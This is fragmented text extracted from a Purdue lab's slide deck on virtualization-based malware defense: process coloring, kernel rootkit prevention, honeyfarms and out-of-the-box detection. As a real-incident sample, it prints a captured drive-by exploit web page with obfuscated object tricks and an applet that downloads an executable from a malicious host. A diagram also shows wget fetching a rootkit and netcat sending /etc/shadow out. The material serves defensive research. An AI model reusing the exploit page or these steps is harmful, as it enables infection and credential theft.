Research at FRIENDS Labhttp://friends.cs.purdue.edu

Dongyan Xu Associate ProfessorDepartment of Computer Science andCenter for Education and Research in Information Assurance and Security (CERIAS)Purdue University

Virtual Infrastructures • VIOLIN virtual infrastructure• Infrastructure adaptation• Infrastructure snapshot• Real-world deployment (http://www.nanohub.org)

Research Overview

Malware Defense• Honeyfarm (Collapsar) • Playground (vGround)• VM introspection (OBSERV) • OS info. flow (Proc. Coloring)• Kernel rootkit (NICKLE)• Reverse engr. (AutoFormat)

Virtualization Technology (Xen, QEMU, VirtualBox, KVM, VMware)

Project 1: Process Coloring:Information Flow-based Malware Defense Funded by IARPA through AFRL One-sentence summary:

Propagating and logging provenance information (“colors”) along OS-level information flows for malware detection and sensitive data protection

Prototype integration with Southwest Research Institute

Demo CD completed today!

httpds80httpdrcinit

s45named

s30sendmails55sshd

s80httpd

s30sendmail

s45nameds55sshd

/bin/sh

wget Rootkit

Local files

netcat• /etc/shadow• Confidential

Info

Initial coloring

Coloring diffusion

SyscallLog

Capability 3: Color-based log

partition for contamination analysis

PC Usage Scenario: Server-Side Malware Defense Capability 1:

PC malware alert

“No shell process should have the color

of Apache”

Capability 2: Color-based

identification of malware break-in point

Demo at: http://friends.cs.purdue.edu/projects/pc/pc-demo.html

firefox

notepad

turbotaxwarcraft

Web Browser

Tax

EditorGames

Agobot

Tax files

PC Usage Scenario: Client-Side Malware Defense

Agobot

www.malicious.net

PC malware alert

“Web browser and tax colors should never

mix”

Demo at: http://friends.cs.purdue.edu/projects/pc/files/sinkfile.avi

Project 2:Strategic Defense against Kernel Rootkit Attacks

Kernel rootkits: stealthy and foundational threat to cyberspace

Current defense: Symptom-based detection Disruption to production system Manual forensics

Strategic defense: Proactive indication before attack Automatic avoidance by “steering away”

production system (non-stop operation) Live forensics for future protection

Integrated Defense Scenario

Guest OS

VMM

Right before attackAfter threat indication

Production VM

Fork

Avoidance

Indication

Guest OS

VMM

Forensics VM

Guest OS

VMM

Production VM

RootkitProfile

Kernel Guarding

Code

Clean-up Forensics

Results with Real-World Kernel Rootkits Indicating and preventing kernel rootkit attacks at

VMM level

[RAID08 Best Paper Award]

Thank you!For more information:

URL: http://friends.cs.purdue.edu (on a VM)Google: “Purdue virtualization friends”Email: dxu@cs.purdue.edu

NICKLE: Kernel Rootkit Indicator “No Instruction Creeping into Kernel Level Executed”

NICKLE

Standard memory

Kernel Code

Shadow memory

VMM

Guest OS

Step 1: Create two memory spaces Standard memory Shadow memory

Step 2: Authenticate and copy kernel code to shadow memory

Step 3: Memory access dispatch Kernel code fetch ->

shadow memory All other accesses ->

standard memoryKernel Code

Collapsar Honeyfarm

Domain B

Domain A

Domain C

Front-End

VM-based Honeypots

Management Station

Collapsar CenterCorrelation Engine

RedirectorRedirector

Collapsar Honeyfarm

Redirector

Benefit 1: Centralized management of

honeypots w/ distributed presence

Benefit 2: Off-site attack occurrence

Benefit 3: Convenience for real-time attack

correlation and log mining

[USENIX Security’04]

Malicious Web

Server

VM-based Honeypots

Domain B

Domain A

Domain C

Front-End

Collapsar Center

RedirectorRedirector

Redirector

Collapsar as a Client-side Honeyfarm Active Honeypots w/ Vulnerable Client-side

Software Web Browsers (e.g., IE, Firefox, …) Email Clients (e.g., Outlook, …)

[ HoneyMonkey, NDSS’06]PlanetLab (310 sites)

288 malicious sites / 2 zero-day exploits

Upon Clicking a malicious URL http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html

22 unwanted programs installed without user’s consent!

MS04-013

MS03-011

MS05-002

<html><head><title></title></head><body>

<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>

<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>

try{document.write('<object data=`&#109&#115&#45&#105&#116&#115&#58&#109&#104&#116&#109&#108&#58&#102&#105&#108&#101&#58;//C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>

</body></html>

A Real Incident [JPDC’06]

vGround: A Virtual Worm Playground (demo)

dallas.cs.purdue.edu

High fidelity VM: full-system virtualization

Strict confinement VN: link-layer network virtualization

Easy deployment Locally deployable

Efficient experiments Images generation time: 60 seconds Boot-strap time: 90 seconds Tear-down time: 10 seconds

A Worm Playground

In “Fighting Computer Virus Attacks”, Peter Szor, USENIX Security Symp., 2004

[RAID’05]

State-of-the-art malware defense Running anti-malware software inside the

monitored system Advantage: They can see everything (e.g., files,

processes…) Disadvantage: They may not see anything!

VirusScan

FirefoxIE

OS Kernel

…

OBSERV: “Out-of-the-Box” Malware Detection

Why “Out-of-the-Box”? Current approach fundamentally flawed

Anti-malware software and protected software running at the same privilege level

Lack of root-of-trust Solution: Going “out-of-the-box”

FirefoxIE

OS Kernel

…

VirusScan

Virtual Machine Monitor (VMM)

The “Semantic-Gap” Challenge

What we can observe: Low-level states

Memory pages, disk blocks… Low-level events

Privileged instructions, Interrupts, I/O…

What we want to observe: High-level semantic states

Files, processes… high-level semantic events

System calls, context switches…

Virtual Machine Monitor (e.g., VMware, Xen)

Guest OSSemantic Gap

VirusScan

Our Solution: OBSERV OBSERV: “Out-of-the-Box” with SEmantically

Reconstructed View A new mechanism missing in existing VMMs

FirefoxIE

OS Kernel

…

Virtual Machine Monitor (VMM)

OBSERV

[ACM CCS’07]

New Capabilities Enabled by OBSERV

Capability II: Malware detection by

view comparison

Capability I: Invisible system

logging

FirefoxIE

OS Kernel

…

Virtual Machine Monitor (VMM) OBSERV

Capability III: External run of COTS

anti-malware software

OBSERV View Inside-the-boxView Diff

AutoFormat: Malware Protocol Reverse Engineering Given malware binary, infer malware protocol

format

[NDSS’08]

Inferring Slapper Worm (Botnet) ProtocolNested data

structure declaration

Compiler inserted gap

1

2

3

1

2

VIOLIN: Portable, Adaptive Virtual Environments Adaptive Virtual Environments on a shared

hosting infrastructure

Internet

DB

DB

[TR’03, IEEE Computer’05]

Adaptation Architecture and Sample Scenario (Demo)

VIOLIN Switch VIOLIN Switch

Monitoring Daemon

VIOLIN Switch VIOLIN Switch

Monitoring Daemon

VIOLIN Switch VIOLIN Switch

Monitoring Daemon

Monitoring Daemon

AdaptationManager

VMs VMs

VMsVMsPhysicalNetwork

Scale Up

CPU Update

MigrateVMM

VMMVMM

VMM

VIOLIN Switch

[IEEE ICAC’06]

Live VIOLIN Snapshot (Demo)

Useful for application and OS transparent recovery from Crashes, failures, and disasters Unexpected power/network outage And for VIOLIN replay

Hosting center Hosting center

Snapshot Resume

[ACM/IEEE VTDC’07]